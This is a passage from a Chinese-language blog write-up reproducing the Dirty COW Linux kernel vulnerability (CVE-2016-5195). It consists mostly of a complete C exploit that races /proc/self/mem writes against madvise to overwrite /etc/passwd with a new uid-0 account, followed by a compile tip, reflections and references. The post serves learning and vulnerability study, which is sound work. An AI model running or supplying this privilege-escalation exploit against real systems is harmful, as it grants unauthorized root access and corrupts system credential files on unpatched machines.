97
98
99
100
101
102
103
104
105
106
107
108
109
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <crypt.h>

struct stat dest_st;
void *mem;
pthread_t mem_pthread, madvise_pthread;
int dest_fd, fake_fd, mem_fd;
int info_len;
char * info_data;

struct passwd_info
{
char * name;
char * password;
int uid;
int gid;
char * info;
char * home_dir;
char * shell;
};


void * mem_func(void * argv)
{
mem_fd = open("/proc/self/mem", O_RDWR);
printf("mem_fd is %d\n", mem_fd);
for (int i = 0; i < 0x100000; i++)
{
lseek(mem_fd, (off_t) mem, SEEK_SET);
write(mem_fd, info_data, info_len);
}
return NULL;
}

void * madvise_func(void * argv)
{
for (int i = 0; i < 0x100000; i++)
{
madvise(mem, 0x100, MADV_DONTNEED);
}
return NULL;
}


int main(int argc, char ** argv)
{
struct passwd_info korey_info;

korey_info.name = "korey";
korey_info.password = "password";
korey_info.uid = 0;
korey_info.gid = 0;
korey_info.info = "korey0sh1's shell";
korey_info.home_dir = "/root";
korey_info.shell = "/bin/bash";

info_len = snprintf(NULL, 0, "%s:%s:%d:%d:%s:%s:%s\n",
korey_info.name,
crypt(korey_info.password, korey_info.name),
korey_info.uid,
korey_info.gid,
korey_info.info,
korey_info.home_dir,
korey_info.shell
);

info_data = malloc(info_len + 10);

sprintf(info_data, "%s:%s:%d:%d:%s:%s:%s\n",
korey_info.name,
crypt(korey_info.password, korey_info.name),
korey_info.uid,
korey_info.gid,
korey_info.info,
korey_info.home_dir,
korey_info.shell
);

printf("info is ");
write(1, info_data, info_len);


dest_fd = open("/etc/passwd", O_RDONLY);
printf("dest_fd is %d\n", dest_fd);
fstat(dest_fd, &dest_st);
mem = mmap(NULL, dest_st.st_size, PROT_READ, MAP_PRIVATE, dest_fd, 0);

pthread_create(&mem_pthread, NULL, mem_func, NULL);
pthread_create(&madvise_pthread, NULL, madvise_func, NULL);

pthread_join(madvise_pthread, NULL);
pthread_join(mem_pthread, NULL);


return 0;
}


crypt.h是个外部库,所以编译的时候要手动加个-lcrypt

这个就舒服多了

0xff:写在最后

前后花了一周左右,才磕磕碰碰地复现完了这个古早的CVE

本来想着这么老的洞,能不能试试不看别的师傅的解析和poc,自己搞明白并把exp写出来😭😭😭

结果大失败呜呜呜🥵🥵🥵

回首看8年前的dirtycow,笔者深深地被Linux内核利用,这门old school的黑客美学折服

现在终于明白小七师傅说的:内核利用的发展路程本身的魅力已经足够吸引人,在海边沙滩上捡到一个贝壳已经足够开心: )

望能不断坚持: )

refer

【CVE.0x00】CVE-2016-5195 “脏牛”漏洞复现及简要分析 - arttnba3’s blog

剖析脏牛3_-proc-self-mem是怎么实现的 - 知乎 (zhihu.com)


CVE-2016-5195(Dirty Cow) Remake
http://example.com/2024/02/27/dirtycow/
作者
korey0sh1
发布于
2024年2月27日
许可协议